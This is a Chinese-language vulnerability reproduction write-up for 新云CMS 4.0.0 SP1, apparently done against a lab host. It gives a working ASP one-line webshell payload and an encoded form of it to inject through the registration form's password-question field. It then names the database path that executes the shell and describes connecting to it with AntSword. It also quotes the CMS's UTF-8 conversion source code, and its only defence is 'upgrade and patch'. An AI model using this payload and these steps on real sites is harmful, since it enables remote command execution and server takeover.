一.漏洞描述
在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell
二.影响版本
新云CMS 4.0.0 SP1
三.漏洞复现
1.使用御剑对域名进行探测
登录网址为http://219.153.49.228/login.asp
2.注册用户
在“密码问题”插入一句话木马
一句话木马为:
<% execute request(“a”)%>”
经过Erlang 中文简体字 GB2312 转 unicode 转换来的
┼攠數畣整爠煥敵瑳∨≡┩愾
3.检查木马是否上传成功
数据库的默认地址:data/ask_newasp.asa
在URL输入:http://219.153.49.228:46761/data/ask_newasp.asa
当出现该条语句时,就证明一句话木马上传成功
4.上传成功后连接蚁剑
基础配置如下:
成功连接
四.漏洞分析
此项漏洞形成原因,在注册用户处其他部分都做了字符校验,而问题回答做了MD5加密(失去了利用价值),唯有密码提问框变量question可直接存入了数据库中,在这套CMS系统的const.asp文件中有一个函数EncodeUtfSO,它的目的就是将一些数据(比如这里的密码提示问题)从Encode编码转换成Utf8,基于这种考虑
位于/inetpub/wwwroot/inc/const.asp
源码(使用JS把中文字符转换为UTF-8):
function EncodeUtf8(s1)
{
var s = escape(s1);
var sa = s.split("%");
var retV ="";
if(sa[0] != "")
{
retV = sa[0];
}
for(var i = 1; i < sa.length; i ++)
{
if(sa[i].substring(0,1) == "u")
{
retV += Hex2Utf8(Str2Hex(sa[i].substring(1,5)));
}
else retV += "%" + sa[i];
}
return retV;
}
function Str2Hex(s)
{
var c = "";
var n;
var ss = "0123456789ABCDEF";
var digS = "";
for(var i = 0; i < s.length; i ++)
{
c = s.charAt(i);
n = ss.indexOf(c);
digS += Dec2Dig(eval(n));
}
//return value;
return digS;
}
function Dec2Dig(n1)
{
var s = "";
var n2 = 0;
for(var i = 0; i < 4; i++)
{
n2 = Math.pow(2,3 - i);
if(n1 >= n2)
{
s += '1';
n1 = n1 - n2;
}
else
s += '0';
}
return s;
}
function Dig2Dec(s)
{
var retV = 0;
if(s.length == 4)
{
for(var i = 0; i < 4; i ++)
{
retV += eval(s.charAt(i)) * Math.pow(2, 3 - i);
}
return retV;
}
return -1;
}
function Hex2Utf8(s)
{
var retS = "";
var tempS = "";
var ss = "";
if(s.length == 16)
{
tempS = "1110" + s.substring(0, 4);
tempS += "10" + s.substring(4, 10);
tempS += "10" + s.substring(10,16);
var sss = "0123456789ABCDEF";
for(var i = 0; i < 3; i ++)
{
retS += "%";
ss = tempS.substring(i * 8, (eval(i)+1)*8);
retS += sss.charAt(Dig2Dec(ss.substring(0,4)));
retS += sss.charAt(Dig2Dec(ss.substring(4,8)));
}
return retS;
}
return "";
}
具体原理参考链接:http://www.520ve.com/2290.html
五.防御方法
升级版本打补丁
网络信息安全-ploto